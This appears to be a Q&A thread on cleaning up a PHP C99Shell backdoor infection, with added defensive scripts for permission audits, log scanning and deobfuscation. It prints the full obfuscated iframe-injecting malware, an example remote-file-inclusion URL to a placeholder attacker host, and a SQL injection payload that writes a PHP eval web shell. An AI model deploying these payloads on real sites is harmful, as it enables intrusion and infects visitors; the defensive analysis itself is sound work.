Protect website from Backdoor/PHP.C99Shell aka Trojan.Script.224490


Solution 1

Your website has been hacked using exploit code.

  1. You must update everything, including any PHP libraries you may have installed.

  2. Run phpsecinfo and remove all red and as much yellow as possible by modifying your .htaccess or php.ini.

  3. Remove write privileges from all files and folders in your web root (chmod 500 -R /var/www && chown www-root /var/www). The chown should be to whatever user is running PHP, so do a <?php system('whoami');?> to figure that out.

  4. Change all passwords, and use sftp or ftps if you can.

  5. Remove FILE privileges from your MySQL account that your php application uses.
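Step 3 above is easier to verify than to apply blindly across a shared host. The following is an added example, not code from the answer's author: a small Python audit that walks a web root and reports every file or directory whose mode deviates from the expected layout (755 for directories, 644 for files, nothing writable by group or world), with a strict mode that also flags owner-writable entries as step 3 asks. The demo tree it builds is constructed for illustration and is not anyone's real site.

```python
import os
import stat
import sys
import tempfile
from typing import Dict, List, Tuple

# Modes quoted in the thread: 755 for directories and 644 for files are the
# usual layout; step 3 goes further and wants write removed from everything
# the PHP user can reach.
EXPECTED_DIR_MODE = 0o755
EXPECTED_FILE_MODE = 0o644
WRITE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def audit_webroot(root: str, strict: bool = False) -> List[Tuple[str, str, str]]:
    """Walk `root` and return (path, octal mode, reason) for each entry whose
    permissions deviate from the expected layout.

    strict=False flags group/world-writable entries and any mode other than
    755/644. strict=True additionally flags entries the owner can write,
    matching the "remove write privileges" advice. Symlinks are skipped so a
    link cannot drag the audit outside the web root."""
    findings: List[Tuple[str, str, str]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        entries = [(dirpath, True)] + [(os.path.join(dirpath, f), False) for f in filenames]
        for path, is_dir in entries:
            if os.path.islink(path):
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            expected = EXPECTED_DIR_MODE if is_dir else EXPECTED_FILE_MODE
            if mode & WRITE_BY_OTHERS:
                findings.append((path, oct(mode), "writable by group or world"))
            elif strict and mode & stat.S_IWUSR:
                findings.append((path, oct(mode), "writable by owner"))
            elif mode != expected:
                findings.append((path, oct(mode), f"expected {oct(expected)}"))
    return findings


def build_demo_webroot() -> Dict[str, str]:
    """Constructed sample tree (not a real site): a correctly permissioned
    index.php beside a world-writable upload script and a 777 directory, the
    kind of layout that lets a dropped PHP file land and run."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.chmod(root, 0o755)
    paths = {"root": root}

    def touch(name: str, mode: int) -> str:
        p = os.path.join(root, name)
        open(p, "w").close()
        os.chmod(p, mode)
        return p

    paths["index"] = touch("index.php", 0o644)
    paths["upload"] = touch("upload.php", 0o666)
    cache = os.path.join(root, "cache")
    os.mkdir(cache)
    os.chmod(cache, 0o777)
    paths["cache"] = cache
    return paths


if __name__ == "__main__":
    # Usage: python audit.py [/var/www] [--strict]; with no path, audits the demo tree.
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    target = args[0] if args else build_demo_webroot()["root"]
    for path, mode, reason in audit_webroot(target, strict="--strict" in sys.argv):
        print(f"{mode} {path}: {reason}")
```

Run it as the same user PHP runs under (the whoami trick above tells you which); ownership mismatches show up as errors from chmod, not as findings here, so fix ownership first and re-run the audit.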

Solution 2

Many of the websites we've seen that have been hacked are the result of a virus on a PC that's used to FTP files to the infected website. The virus steals the FTP password in a variety of ways - but primarily two.

First, if you're using a free FTP program like FileZilla, you should know that these programs store their saved login credentials in a plain text file. It's easy for the virus to find these, read them and send the information to a server, which then logs into FTP with valid credentials, copies certain files to itself, infects them, then sends them back to the website. Oftentimes it also copies these "backdoor" shell scripts to the website as well, so that when the FTP passwords are changed, they can still re-infect the site.

The virus also "sniffs" the FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal the information that way as well.

Quite often, however, when we've seen a backdoor that causes the infection, it's usually the result of a Remote File Inclusion vulnerability somewhere on the site. The hackers are constantly trying to add a URL that points to one of their backdoors to the end of any request string. So in your access logs you might see something like:

/path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt????

Where the path/folder string is just for demonstration purposes here.

Sometimes that command works and they are able to copy id.txt to the intended website and thus have a backdoor shell script from which they can manipulate the files.

Change all passwords - FTP, database, cPanel or other administrative interface.

Scan all PCs for viruses.

Change to SFTP.

Check all folders for 755 permissions and all files for 644. This is the standard.

If it were SQL injection the infection wouldn't be at the end of the file. It would be somewhere there's a SQL call to generate the content.

Yes. With today's backdoors, the attacker can and probably has already viewed the config.php files where your MySQL data is saved.

Change all passwords.
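The access-log pattern this answer describes (a remote URL tacked onto the query string) is easy to hunt for after the fact. The following is an added example, not code from the answer's author: a Python scanner over Apache combined-format log lines that reports every request whose query string is, or contains a parameter whose value is, a remote http/https/ftp URL, after undoing percent-encoding so an encoded "%3A%2F%2F" is caught too. The log lines are constructed for the example (documentation IP ranges, and the placeholder hostname the answer uses); the regexes and field names are this example's own.

```python
import re
import sys
from typing import Dict, List
from urllib.parse import parse_qsl, unquote

# Constructed Apache "combined" access log lines (not from any real server).
# Lines 2 and 4 carry a remote URL in the query string, the shape described in
# the answer; lines 1 and 3 are ordinary requests.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [10/Jul/2010:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2010:12:00:05 +0000] "GET /path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt???? HTTP/1.1" 200 812 "-" "libwww-perl/5.8"
203.0.113.10 - - [10/Jul/2010:12:00:09 +0000] "GET /page.php?id=42&lang=en HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jul/2010:12:00:12 +0000] "GET /inc/lib.php?page=http%3A%2F%2Fwww.hackerswebsite.com%2Fid.txt HTTP/1.1" 404 210 "-" "libwww-perl/5.8"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A value that is itself a URL with a scheme PHP's URL wrappers would fetch.
REMOTE_URL_RE = re.compile(r'^(https?|ftps?)://', re.IGNORECASE)


def find_rfi_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose query string carries a remote URL,
    either as the whole query (file.php?http://...) or as a parameter value
    (file.php?page=http://...). Percent-encoding is undone before the check."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path, _, query = m.group("target").partition("?")
        if not query:
            continue
        # Bare-query form first, then each parsed parameter (parse_qsl
        # already percent-decodes names and values).
        candidates = [("", unquote(query))]
        candidates += [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)]
        for param, value in candidates:
            if REMOTE_URL_RE.match(value.strip()):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": path,
                    "param": param,
                    "remote": value,
                    "status": m.group("status"),
                })
                break  # one record per request line
    return hits


if __name__ == "__main__":
    # Usage: python rfi_scan.py /var/log/apache2/access.log; no argument scans the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_ACCESS_LOG
    for h in find_rfi_attempts(text):
        where = h["param"] or "(bare query)"
        print(f'{h["time"]} {h["ip"]} {h["path"]} {where} -> {h["remote"]} [{h["status"]}]')
```

A 200 status on such a request does not by itself mean the inclusion worked, but it marks the script and the timestamp to examine first; a burst of these from one client against many different .php paths is the scanner behaviour the answer describes.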

Author by

caw

Updated on July 25, 2022

Comments

  • caw
    caw almost 2 years

    My website was infected by a trojan script.

    Somebody managed to create/upload a file called "x76x09.php" or "config.php" into my webspace's root directory. Its size is 44287 bytes and its MD5 checksum is 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. These results say it's "Backdoor/PHP.C99Shell" or "Trojan.Script.224490".

    This file was executed at the same moment it was created, so it must have happened automatically. This file added the following malicious code to the end of every index.php on my webspace.

    </body>
    </html><body><script>
    var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
    return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
    return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
    i.i.l.j();</script>
    

    After that code was on my page, users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.

    The infection did happen although I have allow_url_fopen and allow_url_include turned off. And my hoster says the file wasn't uploaded via FTP.

    So my questions are:

    • What does the malicious code do? How is it encoded?
    • How could the remote file ("x76x09.php" or "config.php") come to my webspace? SQL injection? Virus on my own PC?
    • How can I protect my website from such attacks in the future?

    Thank you very much in advance! I really need help.

    This question is similar. But it's more like a report. I didn't know from the beginning that it was a virus. So this question here refers to the virus itself; the other question does not.

  • Kranu
    Kranu almost 14 years
    @The Rook: You highly doubt what?
  • rook
    rook almost 14 years
    @Kranu that is one of over 6,000 ways it could have happened. You should read my response.
  • caw
    caw almost 14 years
    Thank you very much! (1) I haven't installed any php libraries on my own. Just my hoster. But I'm sure my hoster does his job. (3) Can I assign "544" or "444" to all of my project files? I edit them via FTP so why give write rights? "500" doesn't work. Error messages appear!? (4) I changed the passwords. I asked my hoster if I can use sftp or ftps. (5) I don't know how to change these privileges. But until now, my PHP scripts used the global MySQL user. This is a big mistake, right? I created another user, just for this database.
  • caw
    caw almost 14 years
    Thanks for the answer! But no, I don't have any upload scripts on my webspace. If it's a directory browser: Could the attacker view my config php files where my MySQL data is saved?
  • rook
    rook almost 14 years
    @marco92w No, the last 2 digits must always be zeros. If you are getting errors then the ownership is incorrect. chmod 555 will work for now, but it's a terrible practice. You never want to give all users access to your files. Yes, using a global MySQL user is a very serious mistake. If everything is up to date, I think that someone else on the host box hacked your site; what you are describing is terrible.
  • caw
    caw almost 14 years
    Thanks! (A) "whoami" gives me "nobody" as the response!? (B) Why not "444" for files and "555" for directories? Then nobody has write privileges, correct? (C) I've changed the PHP scripts' user to a non-global user. And I changed MySQL's and FTP's password. Is this enough?
  • caw
    caw almost 14 years
    I use FTPES instead of FTP now.
  • rook
    rook almost 14 years
    @marco92w To be technical, 111 is execute privileges, which is what PHP needs, and this will prevent other users from reading your files (like your DB password!!!). I'm pretty sure this works, although I haven't tested it. 444 is read permissions, which is needed by static files (.js .html .jpg). If you are running as "nobody" then I'm pretty sure you have to give everybody rights. As long as you have done everything on my list, and do a chmod 111 on all your PHP files, then you should be good to go. Just changing the permissions isn't enough.
  • Kranu
    Kranu almost 14 years
    So long as the script has read permissions on your config.php files, yes, it can read it. If they want to read your MySQL data, they could just upload a PHP file to extract all the data it can find.
  • Kranu
    Kranu almost 14 years
    @The Rook: You posted your response after my comment.
  • rook
    rook almost 14 years
    @Kranu you're right, but my point is that it's more likely that SQL injection is used to drop the file. In MySQL you can exploit a query by injecting a union select into outfile at the end of a query. For instance: select col from table where some=1 union select '<?php eval($_GET[e]);?>' into outfile '/var/www/backdoor.php'
  • caw
    caw almost 14 years
    Very interesting. I think this could really have been the leak. If my MySQL account doesn't have FILE privileges, this way of injection isn't possible anymore, is it?
  • caw
    caw almost 14 years
    No, "111" (only execute) for files doesn't work. But "444" (only read) does work. So should I assign "444" to all of my PHP files? And "555" to all directories? It wouldn't be possible to create a directory browser on my webspace any longer, would it?
  • rook
    rook almost 14 years
    @marco92w chmod 555 is read and execute; I'm not sure why that is required. Making your files globally readable is horrible; you need to move hosts.
  • rook
    rook almost 14 years
    @marco92w You can still use a union select to grab data from another database/table, such as the administrative username/password hash/salt, and then break the password with John the Ripper. But into outfile and loadfile() are really useful for exploiting MySQL with SQL injection. If MySQL is out of date it may be possible to get remote code execution by using a buffer overflow using a malformed query.
  • caw
    caw over 13 years
    Thank you! So you think my FileZilla was infected and uploaded the remote file to my server, right?
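The question's first bullet ("What does the malicious code do? How is it encoded?") is answerable from the injected script alone, and the thread never quite spells it out. The following is an added example, not code from anyone in the thread: a Python port of the two encoding layers the script uses, written to explain rather than to run the payload. The DOM API names are hidden as JavaScript \xNN string escapes (expanding them shows createElement and iframe); the iframe's src is stored as a dot-separated hex string that the script's i.l.i.i turns into %NN escapes and unescapes, and then its i.i.j.i function applies a letter substitution that works out to ROT13. Decoding the copied string yields a plain http:// URL to a numeric IP address with a query parameter whose value matches the dropped file's name x76x09, which is consistent with the reported plugin prompt and the Java exploit that followed. The regexes and function names are this example's own; the encoded string and the one-line snippet are copied verbatim from the question.

```python
import re
from urllib.parse import unquote

# Copied from the injected script in the question: the argument to i.l.i.i(...)
# that ends up as the iframe's src after both decoding steps.
ENCODED_IFRAME_SRC = (
    ".75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61"
    ".71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39"
)

# One statement from the same script, with the DOM API names hidden as \xNN escapes.
SNIPPET = r"var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');"

HEX_ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')
HEX_STRING_RE = re.compile(r"'((?:\\x[0-9a-fA-F]{2})+)'")


def decode_js_hex_escapes(s: str) -> str:
    """Expand JavaScript \\xNN escapes to the characters the engine sees."""
    return HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def reveal_hidden_strings(js: str) -> list:
    """List every single-quoted literal built only from \\xNN escapes, decoded.
    On the injected script this exposes names like createElement, appendChild,
    getElementById and iframe, which is what the code is really calling."""
    return [decode_js_hex_escapes(lit) for lit in HEX_STRING_RE.findall(js)]


def decode_dotted_hex(s: str) -> str:
    """Port of the script's i.l.i.i: every '.' becomes '%', then window.unescape."""
    return unquote(s.replace(".", "%"))


def letter_shift(s: str) -> str:
    """Port of the script's i.i.j.i, applied to each ASCII letter c:
    ((c & 223) - 52) % 26 + (c & 32) + 65.
    Clearing bit 5 uppercases, subtract/modulo rotates by 13 positions, and
    adding back (c & 32) restores case: the transform is ROT13."""
    out = []
    for ch in s:
        if "A" <= ch <= "Z" or "a" <= ch <= "z":
            c = ord(ch)
            out.append(chr(((c & 223) - 52) % 26 + (c & 32) + 65))
        else:
            out.append(ch)
    return "".join(out)


def recover_iframe_src(encoded: str = ENCODED_IFRAME_SRC) -> str:
    """Apply both layers in the order the script does: the decoded-by-unescape
    text is parked in a hidden <input>, read back, and ROT13'd into the src."""
    return letter_shift(decode_dotted_hex(encoded))


if __name__ == "__main__":
    print("hidden names in snippet:", reveal_hidden_strings(SNIPPET))
    print("iframe src:", recover_iframe_src())
```

Running the two decoders over the whole injected block, rather than the single snippet above, shows the full sequence: a hidden input element is created to hold the unescaped string, an element styled display:none is appended to the body, and an iframe whose src is the ROT13-decoded URL is appended inside it, which is the invisible frame that served the browser exploit to the visitors mentioned in the question.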